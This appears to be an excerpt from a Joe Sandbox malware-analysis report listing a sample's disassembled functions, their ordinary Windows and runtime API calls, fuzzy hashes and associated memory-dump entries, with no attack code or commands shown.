Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: bb477172506094317bbcdd7a310395baf696b907f0953b721fc6cfb039ebb0c3
Instruction ID: 94f99650cc4f58dc705ca10d954fc6e8377ad7dde1f32c23e761113d633a2a8b
Opcode Fuzzy Hash: bb477172506094317bbcdd7a310395baf696b907f0953b721fc6cfb039ebb0c3
Instruction Fuzzy Hash: 6B112B32740530A7DB222A67AC09B7F7668EFD0BD4F440126FC45A7252DA68DC8183FD

Function 00419299 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 0041930A
__msize.LIBCMT ref: 0041932D
_malloc.LIBCMT ref: 00419345
_malloc.LIBCMT ref: 0041935A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 8991579d4e707d153ecc6ad09f43841ed59957b01ec82ee211c0c6440e28c272
Instruction ID: 9beec91d10cab7dff3c44e9da63e1bae43df0b723fc49c22f3c3c5037fd97f92
Opcode Fuzzy Hash: 8991579d4e707d153ecc6ad09f43841ed59957b01ec82ee211c0c6440e28c272
Instruction Fuzzy Hash: 3A21B7315006119FDB25AF31D8A5ADA77A4AF45724B10855FE8588A2D2DB3CDDC0C78D

Function 00468AA0 Relevance: 6.1, APIs: 4, Instructions: 76memorywindowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001100,00000000,00468D0A,00000400,000000FF,00000000,00000000,87E7D08C,?,?,00000000,0046CC7B,000000FF,?,00468D0A,00000000), ref: 00468AE0

Part of subcall function 004035E0: _DebugHeapAllocator.LIBCPMTD ref: 00403635

_DebugHeapAllocator.LIBCPMTD ref: 00468B09
LocalFree.KERNEL32(000000FF,?,?,00000000,0046CC7B,000000FF,?,00468D0A), ref: 00468B83

Part of subcall function 004049A0: _DebugHeapAllocator.LIBCPMTD ref: 004049D8
Part of subcall function 004049A0: _DebugHeapAllocator.LIBCPMTD ref: 00404A17

_DebugHeapAllocator.LIBCPMTD ref: 00468B5F

Part of subcall function 004043B0: _DebugHeapAllocator.LIBCPMTD ref: 004043BE

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$FormatFreeLocalMessage
String ID:
API String ID: 3419676974-0
Opcode ID: 456a0196226ba8bba0a2d824c80e62a79a7ba8c457e11f9218ccdccd4f944ddd
Instruction ID: d55647bd11dc34d349906d49e7b5fda6a72a8e63cf469fd290f7ae4a0304c026
Opcode Fuzzy Hash: 456a0196226ba8bba0a2d824c80e62a79a7ba8c457e11f9218ccdccd4f944ddd
Instruction Fuzzy Hash: 6731FEB1E00209ABDB04DF95D955BEEB7B9EB48714F10822DE611B72D0DB786901CB98

Function 0044E0E0 Relevance: 6.1, APIs: 4, Instructions: 73fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0044E108
ReadFile.KERNEL32(000000FF,00000000,00000254,00000000,00000000), ref: 0044E135
GetFileSize.KERNEL32(000000FF,?), ref: 0044E19C
CloseHandle.KERNEL32(000000FF), ref: 0044E1AB

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 948772097f289f7cf5aaa1709bc5d9e3e67150b3c4ae162dfebd0a6e89bf1c39
Instruction ID: b0250a4c62bdfd662b5d600d04ad0d552b087d4828168d96a763d9f3324a0967
Opcode Fuzzy Hash: 948772097f289f7cf5aaa1709bc5d9e3e67150b3c4ae162dfebd0a6e89bf1c39
Instruction Fuzzy Hash: 2C312874E00209EFEB04CF96C885BAFBBB1BB88304F208159E511A7380D7B86A41CF95

Function 0041C9FF Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

CharNextW.USER32(?), ref: 0041CA56
CharNextW.USER32(?), ref: 0041CA78
__wcstoi64.LIBCMT ref: 0041CAA3
__wcstoui64.LIBCMT ref: 0041CAAA

Part of subcall function 0042CC56: wcstoxl.LIBCMT ref: 0042CC78

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CharNext$__wcstoi64__wcstoui64wcstoxl
String ID:
API String ID: 2624888415-0
Opcode ID: 3bbb95274b438d59088e7b3fb67fcf9182f318b1f4a4a9fb73686baad04ae6e1
Instruction ID: ae6875452a467f1a7547110e2fac553b4cfd26ef73caf71c52d788c6a31f40b1
Opcode Fuzzy Hash: 3bbb95274b438d59088e7b3fb67fcf9182f318b1f4a4a9fb73686baad04ae6e1
Instruction Fuzzy Hash: AF21087164021E9BC721FB69DC85BAAB3E4AF04384F50402BF954D7240EB38DD81C76D

Function 0040D426 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,00000005), ref: 0040D44E
LoadResource.KERNEL32(?,00000000), ref: 0040D456
LockResource.KERNEL32(00000000), ref: 0040D468
FreeResource.KERNEL32(00000000), ref: 0040D4B6

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4b456643c5f33763c546724a9a284dc0ff3e32801be11d6101fc9d280973024e
Instruction ID: aa12bd0888efa33ddb24bb32fafe0385422443b8ff6ba63b134d6927947a10ce
Opcode Fuzzy Hash: 4b456643c5f33763c546724a9a284dc0ff3e32801be11d6101fc9d280973024e
Instruction Fuzzy Hash: 19118235900711EBD7209FDAD888AA7B7B8FF44725F10843AE84263690E778ED48D765

Function 0044CEB0 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0044AD80: lstrlenW.KERNEL32(00000000,0044A4B7), ref: 0044ADCB
Part of subcall function 0044AD80: SetLastError.KERNEL32(24000002,0044A4B7), ref: 0044ADDF

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0044CF0E
SetLastError.KERNEL32(24000006,?,80000000,00000000,00000000,00000003,00000080), ref: 0044CF28

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
